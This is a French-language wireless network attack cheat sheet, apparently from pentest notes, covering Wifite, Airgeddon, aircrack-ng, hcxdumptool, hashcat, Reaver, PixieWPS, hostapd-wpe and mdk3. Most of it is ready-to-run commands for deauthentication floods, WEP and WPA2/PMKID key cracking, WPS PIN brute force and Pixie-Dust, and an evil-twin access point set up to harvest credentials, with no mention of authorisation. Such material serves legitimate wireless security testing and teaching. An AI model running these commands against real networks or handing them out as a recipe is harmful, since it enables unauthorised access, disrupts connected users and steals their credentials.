Wifite est un outil pour auditer les réseaux sans fil cryptés WEP ou WPA. Il utilise les outils aircrack-ng, pyrit, reaver, tshark pour effectuer l'audit.
Airgeddon est un outils multi-tâche permettant d'auditer les réseaux sans fil. parmis ces fonctionnalités on retrouve par exemple les attaques de types evil twin, brute force, attaques Pixie dust, deauth, sniffer etc.
# Avec aircrack-ng
# activer le mode monitor
sudo airmon-ng start wlan0mon
# Simple ecoute passive
# Pour trouver des points d'accès
sudo airodump-ng wlan0mon
# Ecoute ciblée avec le bssid voulu
# Ciblé sur une cible et un channel
sudo airodump-ng wlan0mon --bssid xx:xx:xx:xx:xx:xx –c 1 –w outfile
Crack WEP
# WEP est un ancien protocole de cryptage mais encore utilisé dans certains endroits
# Il est possible de le cracker directement
# La seule exigence est d'obtenir suffisamment d'IV
# Le processus peut être amélioré en envoyant des paquets deauth
# -0 == attaque detauth, envoi de 3 paquets (peut être augmenté)
aireplay-ng -0 3 -a <TARGET_AP_MAC> wlan0mon -w
# Une autre possibilité est d'utiliser une fausse authentification
# -1 = fausse authentification
# 0 = délai entre les demandes d'association
# -e = AP ESSID (nom)
# -a = AP MAC
# -h = MAC attaquant
aireplay-ng -1 0 -e test -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0mon
# On peut aussi passer par le sniffing et injection ARP
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0mon
# On peut ensuite simplement cracker la clè comme ceci
aircrack-ng outfile -w wordlist
Crack WPA2 PSK / PMKID
# Vous pouvez d'abord vous concentrer sur un AP en utilisant airodump-ng (voir la section de monitoring)
# Ici, vous voulez obtenir le handshake WPA
# Il nécessite un trafic réseau entre le point d'accès et un appareil
#Dumping
sudo airodump-ng wlan0mon --bssid xx:xx:xx:xx:xx:xx –c 1 –w outfile
# Désactivez les appareils connectés pour lancer le processus d'authentification et essayez d'obtenir le handshake
aireplay-ng --deauth 15 -a <TARGET_AP_MAC> wlan0mon
aireplay-ng -0 15 -a <TARGET_AP_MAC> wlan0mon
#On peut ensuite tenter de cracker la clè
aircrack-ng outfile -w wordlist
PMKID
# Vous n'avez pas besoin de trafic réseau pour cette attaque
# Utilisation de hcxtools et hcxdumptool
# D'abord il faut activer le mode monitor
sudo airmon-ng start wlan0mon
# capturer le PMKID
# La capture du PKMID peut prendre un certain temps (plusieurs minutes)
# Si un point d'accès reçoit notre paquet de demande d'association et prend en charge l'envoi
sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1
# Ensuite, convertissez les données capturées dans un format approprié pour hashcat
# -E récupérer les mots de passe possibles du trafic WiFi (en plus, cette liste inclura les ESSID)
# -I récupère les identités du trafic WiFi
# -U récupère les noms d'utilisateur du trafic WiFi
sudo hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
#Enfin on utilise hashcat pour cracker le resultat
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
Crack WPS
# Reaver Attack
# Bruteforcing en ligne du code PIN WPS à 8 chiffres
# Un peu vieux et peut être obsolète de nos jours, mais toujours utilisable
# Outil de dumping intégré Reaver (airodump-ng peut également être utilisé))
# Wash donne des informations sur le WPS verrouillé ou non
# Les WPS verrouillés auront moins de chances de succès
wash -i wlan0mon
reaver -i wlan0mon -c 6 -b 00:23:69:48:33:95 -vv
# Certains constructeurs ont mis en place des protections
# Vous pouvez essayer différents commutateurs pour les contourner
# -L = Ignorer l'état verrouillé
# -N = Ne pas envoyer de paquets NACK lorsque des erreurs sont détectées
# -d = délai de X secondes entre les tentatives de code PIN
# -T = définir le délai d'attente sur X seconde (.5 signifie une demi-seconde)
# -r = Après X tentatives, veille pendant Y secondes
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15
# Pixie-Dust attack
# Fait avec Reaver + PixieWPS
# Cette attaque est basée sur seed / false random
# lancer reaver, nous avons besoin du PKE, PKR, e-hash 1 & e-hash 2, E-nonce / R-nonce
# et la clé d'authentification de Reaver à utiliser pour pixiewps
reaver -i wlan0mon -c 6 -b 00:23:69:48:33:95 -vv -S
# Maintenant, en utilisant pixiexps, vous pouvez déchiffrer le code PIN hors ligne
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
# Enfin, vous pouvez utiliser le code PIN avec Reaver pour accéder au mot de passe en clair
reaver -i <monitor interface> -b <bssid> -c <channel> -p <PIN>
Rogue AP attack
Evil Twin
# Démarrer le mode monitoring
# Si vous prévoyez d'utiliser une attaque deauth, connectez les 2 interfaces eth en même temps
# Pour éviter d'avoir wlan0mon et wlan0 (cela peut entrer en conflit)
sudo airmon-ng start wlan0
# Si des processus bloquent le mode monitoring, kill
sudo airmon-ng check kill
sudo kill <PID>
# Obtenir l'AP cible (ESSID)
# Votre cible peut avoir plusieurs AP, et donc plusieurs adresses MAC
# Ils peuvent fonctionner sur différents canaux
sudo airodump wlan0mon
# Définissez ensuite la cible dans le fichier de configuration
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
ssid=<ESSID>
# Démarrez le point d'accès
# Vous n'obtiendrez que les personnes qui se connectent récemment à l'AP cible
# Si vous voulez que les gens soient déjà connectés, vous devez pousser l'attaque plus loin avec le deauth
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
# démarrer la deuxième interface ethernet
sudo airmon-ng start wlan1
# Deauth (Dans un autre terminal)
# Basé sur les différents ESSID et canaux trouvés à l'étape 3
# -0 est le nombre de paquets deauth envoyés
sudo aireplay-ng -0 10 -a <mac address> -c <channel>
# Maintenant vous n'avez plus qu'à attendre des identifiants
# Vous obtiendrez probablement des hachages NetNTLMv1 que vous devrez cracker
Mettre Wireshark en mode promiscuité, selectionner l'interface WLAN et attendre la connexion d'un client
Bruteforce Avec mdk3
$ mdk3 <interface> p -bl -c <canal> -t <MAC/BSSID>
Wardriving
Le wardriving consiste à balayer des réseaux sans fil à l'aide d'un ordinateur, d'un PDA ou d'un smartphone en utilisant une automobile comme moyen de transport dans le but de trouver des réseaux non-sécurisés et de les exploiter.
Outils
Kismet
Kismet est un sniffer open source, WIDS, wardriver et outil de capture de paquets pour Wi-Fi, Bluetooth, BTLE, thermomètres sans fil, avions, wattmètres, Zigbee, etc.